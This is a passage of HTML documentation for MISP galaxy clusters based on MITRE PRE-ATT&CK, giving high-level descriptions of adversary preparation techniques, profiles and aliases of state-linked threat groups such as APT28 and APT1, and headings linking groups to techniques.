<p>Detectable by Common Defenses explanation: Defender can monitor for domains similar to popular sites (possibly leverage [<a href="https://www.alexa.com" class="bare">https://www.alexa.com</a> Alexa] top ''N'' lists as starting point).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: SSL certificates are readily available at little to no cost.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1622. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1114">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1114</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_test_malware_to_evade_detection_pre_t1136"><a class="anchor" href="#_test_malware_to_evade_detection_pre_t1136"></a><a class="link" href="#_test_malware_to_evade_detection_pre_t1136">Test malware to evade detection - PRE-T1136</a></h3>
<div class="paragraph">
<p>An adversary can run their code on systems with cyber security protections, such as antivirus products, in place to see if their code is detected. They can also test their malware on freely available public services. (Citation: MalwareQAZirtest)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary controls the testing and can ensure data does not leak with proper OPSEC on testing.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary has the ability to procure products and not have reporting return to vendors or can choose to use freely available services</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1623. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1136">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1136</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_build_or_acquire_exploits_pre_t1126"><a class="anchor" href="#_build_or_acquire_exploits_pre_t1126"></a><a class="link" href="#_build_or_acquire_exploits_pre_t1126">Build or acquire exploits - PRE-T1126</a></h3>
<div class="paragraph">
<p>An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary will likely use code repositories, but development will be performed on their local systems.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Several exploit repositories and tool suites exist for re-use and tailoring.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1624. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1126">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1126</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unauthorized_user_introduces_compromise_delivery_mechanism_pre_t1164"><a class="anchor" href="#_unauthorized_user_introduces_compromise_delivery_mechanism_pre_t1164"></a><a class="link" href="#_unauthorized_user_introduces_compromise_delivery_mechanism_pre_t1164">Unauthorized user introduces compromise delivery mechanism - PRE-T1164</a></h3>
<div class="paragraph">
<p>If an adversary can gain physical access to the target&#8217;s environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This varies depending on the amount of monitoring within the environment. Highly secure environments might have more innate monitoring and catch an adversary doing this more easily.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This likely requires the adversary to have close or insider access to introduce the mechanism of compromise.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1625. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1164">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1164</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_common_high_volume_protocols_and_software_pre_t1098"><a class="anchor" href="#_common_high_volume_protocols_and_software_pre_t1098"></a><a class="link" href="#_common_high_volume_protocols_and_software_pre_t1098">Common, high volume protocols and software - PRE-T1098</a></h3>
<div class="paragraph">
<p>Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary&#8217;s traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: High level of entropy in communications. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to decipher or to make the communication less conspicuous.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1626. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1098">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1098</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_hiding_pre_t1097"><a class="anchor" href="#_data_hiding_pre_t1097"></a><a class="link" href="#_data_hiding_pre_t1097">Data Hiding - PRE-T1097</a></h3>
<div class="paragraph">
<p>Certain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This technique requires a more advanced protocol understanding and testing to insert covert communication into legitimate protocol fields.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1627. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1097">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1097</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_pre_attack_intrusion_set"><a class="anchor" href="#_pre_attack_intrusion_set"></a><a class="link" href="#_pre_attack_intrusion_set">Pre Attack - intrusion Set</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK Group.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Pre Attack - intrusion Set is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/pre" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/pre</a> attack - intrusion set.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_2"><a class="anchor" href="#_apt16_g0023_2"></a><a class="link" href="#_apt16_g0023_2">APT16 - G0023</a></h3>
<div class="paragraph">
<p>APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)</p>
</div>
<div class="paragraph">
<p>APT16 - G0023 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT16</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1628. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0023">https://attack.mitre.org/wiki/Group/G0023</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_3"><a class="anchor" href="#_apt28_g0007_3"></a><a class="link" href="#_apt28_g0007_3">APT28 - G0007</a></h3>
<div class="paragraph">
<p>APT28 is a threat group that has been attributed to the Russian government. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28) January 2017 (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee in April 2016. (Citation: Crowdstrike DNC June 2016)</p>
</div>
<div class="paragraph">
<p>APT28 - G0007 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT28</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>Sofacy</p>
</li>
<li>
<p>Pawn Storm</p>
</li>
<li>
<p>Fancy Bear</p>
</li>
<li>
<p>STRONTIUM</p>
</li>
<li>
<p>Tsar Team</p>
</li>
<li>
<p>Threat Group-4127</p>
</li>
<li>
<p>TG-4127</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1629. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0007">https://attack.mitre.org/wiki/Group/G0007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign">https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_2"><a class="anchor" href="#_cleaver_g0003_2"></a><a class="link" href="#_cleaver_g0003_2">Cleaver - G0003</a></h3>
<div class="paragraph">
<p>Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)</p>
</div>
<div class="paragraph">
<p>Cleaver - G0003 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cleaver</p>
</li>
<li>
<p>TG-2889</p>
</li>
<li>
<p>Threat Group 2889</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1630. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0003">https://attack.mitre.org/wiki/Group/G0003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/">http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_2"><a class="anchor" href="#_apt12_g0005_2"></a><a class="link" href="#_apt12_g0005_2">APT12 - G0005</a></h3>
<div class="paragraph">
<p>APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)</p>
</div>
<div class="paragraph">
<p>APT12 - G0005 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT12</p>
</li>
<li>
<p>IXESHE</p>
</li>
<li>
<p>DynCalc</p>
</li>
<li>
<p>Numbered Panda</p>
</li>
<li>
<p>DNSCALC</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1631. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0005">https://attack.mitre.org/wiki/Group/G0005</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/whois-numbered-panda/">http://www.crowdstrike.com/blog/whois-numbered-panda/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_2"><a class="anchor" href="#_apt1_g0006_2"></a><a class="link" href="#_apt1_g0006_2">APT1 - G0006</a></h3>
<div class="paragraph">
<p>APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the Peoples Liberation Army (PLA) General Staff Departments (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>APT1 - G0006 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT1</p>
</li>
<li>
<p>Comment Crew</p>
</li>
<li>
<p>Comment Group</p>
</li>
<li>
<p>Comment Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1632. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0006">https://attack.mitre.org/wiki/Group/G0006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_2"><a class="anchor" href="#_night_dragon_g0014_2"></a><a class="link" href="#_night_dragon_g0014_2">Night Dragon - G0014</a></h3>
<div class="paragraph">
<p>Night Dragon is a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)</p>
</div>
<div class="paragraph">
<p>Night Dragon - G0014 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Night Dragon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1633. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0014">https://attack.mitre.org/wiki/Group/G0014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf">http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt17_g0025_2"><a class="anchor" href="#_apt17_g0025_2"></a><a class="link" href="#_apt17_g0025_2">APT17 - G0025</a></h3>
<div class="paragraph">
<p>APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)</p>
</div>
<div class="paragraph">
<p>APT17 - G0025 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT17</p>
</li>
<li>
<p>Deputy Dog</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1634. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0025">https://attack.mitre.org/wiki/Group/G0025</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf">https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_pre_attack_relationship"><a class="anchor" href="#_pre_attack_relationship"></a><a class="link" href="#_pre_attack_relationship">Pre Attack - Relationship</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>MITRE Relationship.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Pre Attack - Relationship is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/pre" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/pre</a> attack - relationship.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_unconditional_client_side_exploitation_injected_website_driveby_pre_t1149"><a class="anchor" href="#_apt28_g0007_uses_unconditional_client_side_exploitation_injected_website_driveby_pre_t1149"></a><a class="link" href="#_apt28_g0007_uses_unconditional_client_side_exploitation_injected_website_driveby_pre_t1149">APT28 (G0007) uses Unconditional client-side exploitation/Injected Website/Driveby (PRE-T1149)</a></h3>
</div>
<div class="sect2">
<h3 id="_friend_follow_connect_to_targets_of_interest_pre_t1141_related_to_friend_follow_connect_to_targets_of_interest_pre_t1121"><a class="anchor" href="#_friend_follow_connect_to_targets_of_interest_pre_t1141_related_to_friend_follow_connect_to_targets_of_interest_pre_t1121"></a><a class="link" href="#_friend_follow_connect_to_targets_of_interest_pre_t1141_related_to_friend_follow_connect_to_targets_of_interest_pre_t1121">Friend/Follow/Connect to targets of interest (PRE-T1141) related-to Friend/Follow/Connect to targets of interest (PRE-T1121)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_build_and_configure_delivery_systems_pre_t1124"><a class="anchor" href="#_apt1_g0006_uses_build_and_configure_delivery_systems_pre_t1124"></a><a class="link" href="#_apt1_g0006_uses_build_and_configure_delivery_systems_pre_t1124">APT1 (G0006) uses Build and configure delivery systems (PRE-T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"><a class="anchor" href="#_night_dragon_g0014_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"></a><a class="link" href="#_night_dragon_g0014_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144">Night Dragon (G0014) uses Spear phishing messages with malicious attachments (PRE-T1144)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_remote_access_tool_development_pre_t1128"><a class="anchor" href="#_night_dragon_g0014_uses_remote_access_tool_development_pre_t1128"></a><a class="link" href="#_night_dragon_g0014_uses_remote_access_tool_development_pre_t1128">Night Dragon (G0014) uses Remote access tool development (PRE-T1128)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_assess_targeting_options_pre_t1073"><a class="anchor" href="#_apt16_g0023_uses_assess_targeting_options_pre_t1073"></a><a class="link" href="#_apt16_g0023_uses_assess_targeting_options_pre_t1073">APT16 (G0023) uses Assess targeting options (PRE-T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1077_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1066"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1077_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1066"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1077_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1066">Analyze organizational skillsets and deficiencies (PRE-T1077) related-to Analyze organizational skillsets and deficiencies (PRE-T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_confirmation_of_launched_compromise_achieved_pre_t1160"><a class="anchor" href="#_apt1_g0006_uses_confirmation_of_launched_compromise_achieved_pre_t1160"></a><a class="link" href="#_apt1_g0006_uses_confirmation_of_launched_compromise_achieved_pre_t1160">APT1 (G0006) uses Confirmation of launched compromise achieved (PRE-T1160)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_identify_groups_roles_pre_t1047"><a class="anchor" href="#_night_dragon_g0014_uses_identify_groups_roles_pre_t1047"></a><a class="link" href="#_night_dragon_g0014_uses_identify_groups_roles_pre_t1047">Night Dragon (G0014) uses Identify groups/roles (PRE-T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt17_g0025_uses_develop_social_network_persona_digital_footprint_pre_t1119"><a class="anchor" href="#_apt17_g0025_uses_develop_social_network_persona_digital_footprint_pre_t1119"></a><a class="link" href="#_apt17_g0025_uses_develop_social_network_persona_digital_footprint_pre_t1119">APT17 (G0025) uses Develop social network persona digital footprint (PRE-T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"><a class="anchor" href="#_apt1_g0006_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"></a><a class="link" href="#_apt1_g0006_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144">APT1 (G0006) uses Spear phishing messages with malicious attachments (PRE-T1144)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_assess_leadership_areas_of_interest_pre_t1001"><a class="anchor" href="#_apt1_g0006_uses_assess_leadership_areas_of_interest_pre_t1001"></a><a class="link" href="#_apt1_g0006_uses_assess_leadership_areas_of_interest_pre_t1001">APT1 (G0006) uses Assess leadership areas of interest (PRE-T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1045_related_to_conduct_social_engineering_pre_t1026"><a class="anchor" href="#_conduct_social_engineering_pre_t1045_related_to_conduct_social_engineering_pre_t1026"></a><a class="link" href="#_conduct_social_engineering_pre_t1045_related_to_conduct_social_engineering_pre_t1026">Conduct social engineering (PRE-T1045) related-to Conduct social engineering (PRE-T1026)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_build_social_network_persona_pre_t1118"><a class="anchor" href="#_cleaver_g0003_uses_build_social_network_persona_pre_t1118"></a><a class="link" href="#_cleaver_g0003_uses_build_social_network_persona_pre_t1118">Cleaver (G0003) uses Build social network persona (PRE-T1118)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1025_related_to_identify_job_postings_and_needs_gaps_pre_t1055"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1025_related_to_identify_job_postings_and_needs_gaps_pre_t1055"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1025_related_to_identify_job_postings_and_needs_gaps_pre_t1055">Identify job postings and needs/gaps (PRE-T1025) related-to Identify job postings and needs/gaps (PRE-T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_acquire_osint_data_sets_and_information_pre_t1024"><a class="anchor" href="#_apt16_g0023_uses_acquire_osint_data_sets_and_information_pre_t1024"></a><a class="link" href="#_apt16_g0023_uses_acquire_osint_data_sets_and_information_pre_t1024">APT16 (G0023) uses Acquire OSINT data sets and information (PRE-T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084"><a class="anchor" href="#_night_dragon_g0014_uses_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084"></a><a class="link" href="#_night_dragon_g0014_uses_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084">Night Dragon (G0014) uses Acquire and/or use 3rd party infrastructure services (PRE-T1084)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_identify_gap_areas_pre_t1002"><a class="anchor" href="#_night_dragon_g0014_uses_identify_gap_areas_pre_t1002"></a><a class="link" href="#_night_dragon_g0014_uses_identify_gap_areas_pre_t1002">Night Dragon (G0014) uses Identify gap areas (PRE-T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_create_custom_payloads_pre_t1122"><a class="anchor" href="#_cleaver_g0003_uses_create_custom_payloads_pre_t1122"></a><a class="link" href="#_cleaver_g0003_uses_create_custom_payloads_pre_t1122">Cleaver (G0003) uses Create custom payloads (PRE-T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_determine_operational_element_pre_t1019"><a class="anchor" href="#_apt28_g0007_uses_determine_operational_element_pre_t1019"></a><a class="link" href="#_apt28_g0007_uses_determine_operational_element_pre_t1019">APT28 (G0007) uses Determine operational element (PRE-T1019)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_buy_domain_name_pre_t1105"><a class="anchor" href="#_apt28_g0007_uses_buy_domain_name_pre_t1105"></a><a class="link" href="#_apt28_g0007_uses_buy_domain_name_pre_t1105">APT28 (G0007) uses Buy domain name (PRE-T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1055_related_to_identify_job_postings_and_needs_gaps_pre_t1025"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1055_related_to_identify_job_postings_and_needs_gaps_pre_t1025"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1055_related_to_identify_job_postings_and_needs_gaps_pre_t1025">Identify job postings and needs/gaps (PRE-T1055) related-to Identify job postings and needs/gaps (PRE-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_business_relationships_pre_t1060_related_to_identify_business_relationships_pre_t1049"><a class="anchor" href="#_identify_business_relationships_pre_t1060_related_to_identify_business_relationships_pre_t1049"></a><a class="link" href="#_identify_business_relationships_pre_t1060_related_to_identify_business_relationships_pre_t1049">Identify business relationships (PRE-T1060) related-to Identify business relationships (PRE-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_business_relationships_pre_t1049_related_to_identify_business_relationships_pre_t1060"><a class="anchor" href="#_identify_business_relationships_pre_t1049_related_to_identify_business_relationships_pre_t1060"></a><a class="link" href="#_identify_business_relationships_pre_t1049_related_to_identify_business_relationships_pre_t1060">Identify business relationships (PRE-T1049) related-to Identify business relationships (PRE-T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_develop_social_network_persona_digital_footprint_pre_t1119"><a class="anchor" href="#_cleaver_g0003_uses_develop_social_network_persona_digital_footprint_pre_t1119"></a><a class="link" href="#_cleaver_g0003_uses_develop_social_network_persona_digital_footprint_pre_t1119">Cleaver (G0003) uses Develop social network persona digital footprint (PRE-T1119)</a></h3>
</div>
<div class="sect2">
